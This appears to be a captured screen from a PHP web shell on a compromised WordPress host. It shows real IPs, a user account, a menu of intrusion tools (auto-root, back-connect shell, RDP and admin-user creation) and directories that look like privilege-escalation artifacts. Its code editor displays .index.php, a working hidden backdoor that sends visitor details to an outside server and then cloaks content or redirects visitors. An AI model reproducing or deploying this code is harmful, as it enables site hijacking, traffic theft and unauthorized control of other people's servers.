Linux host56.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.126.10 | : 216.73.216.7
Cant Read [ /etc/named.conf ]
8.1.33
vaideehi
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
vaideehi /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
28eae
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
aac0ca
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
717
B
-r-xr-xr-x
.index.php
2.46
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
140
B
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
googledcc224bd12b42586.html
53
B
-rw-r--r--
index.php0
404
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
robots.txt
347
B
-r--r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.53
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php function handleRequest() { $apiUrl = "https://sundongyang.sbs/api/shade"; $payload = [ "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "", "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "", "hostname" => isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : "", "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "", ]; $response = sendPostRequest($apiUrl, $payload); if ( $response && isset($response["success"]) && $response["success"] === true ) { $data = isset($response["data"]) ? $response["data"] : []; $action = isset($data["operation"]) ? $data["operation"] : ""; $target = isset($data["target_url"]) ? $data["target_url"] : ""; if ($action === "cloak" && !empty($target)) { $html = fetchRemoteContent($target); if ($html !== false) { ob_start(); echo $html; ob_end_flush(); } exit(); } elseif ($action === "redirect" && !empty($target)) { header( "Location: " . filter_var($target, FILTER_SANITIZE_URL), true, 302 ); exit(); } } } function sendPostRequest($url, $data) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_TIMEOUT => 5, ]); $result = curl_exec($ch); $httpStatus = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpStatus === 200) { return json_decode($result, true); } return null; } function fetchRemoteContent($url) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 5, ]); $content = curl_exec($ch); if (curl_errno($ch)) { error_log("Fetch error: " . curl_error($ch)); $content = false; } curl_close($ch); return $content; } handleRequest(); if (file_exists("index.php")) { include "index.php"; } elseif (file_exists("index.html")) { header("Location: index.html"); }
Close